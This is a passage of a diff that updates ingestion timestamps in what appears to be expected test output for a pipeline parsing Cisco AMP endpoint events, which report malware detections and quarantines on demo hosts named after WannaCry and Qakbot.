"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -2434,7 +2434,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461651400Z", + "ingested": "2021-12-14T14:40:57.457053592Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", @@ -2529,7 +2529,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461655300Z", + "ingested": "2021-12-14T14:40:57.457053973Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2619,7 +2619,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461659900Z", + "ingested": "2021-12-14T14:40:57.457054388Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", @@ -2718,7 +2718,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461665900Z", + "ingested": "2021-12-14T14:40:57.457054896Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -2812,7 +2812,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461671200Z", + "ingested": "2021-12-14T14:40:57.457055251Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", @@ -2898,7 +2898,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461675200Z", + "ingested": "2021-12-14T14:40:57.457055840Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", @@ -2972,7 +2972,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461679200Z", + "ingested": "2021-12-14T14:40:57.457056304Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", @@ -3044,7 +3044,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461682700Z", + "ingested": "2021-12-14T14:40:57.457056649Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -3141,7 +3141,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461687200Z", + "ingested": "2021-12-14T14:40:57.457057100Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3219,7 +3219,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461693100Z", + "ingested": "2021-12-14T14:40:57.457057451Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1107296257", "kind": "alert", @@ -3284,7 +3284,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:51.461698100Z", + "ingested": "2021-12-14T14:40:57.457057812Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -3348,7 +3348,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461703800Z", + "ingested": "2021-12-14T14:40:57.457058174Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -3436,7 +3436,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461709400Z", + "ingested": "2021-12-14T14:40:57.457058616Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -3522,7 +3522,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461715100Z", + "ingested": "2021-12-14T14:40:57.457059101Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -3596,7 +3596,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461720800Z", + "ingested": "2021-12-14T14:40:57.457059540Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -3672,7 +3672,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461743900Z", + "ingested": "2021-12-14T14:40:57.457059897Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 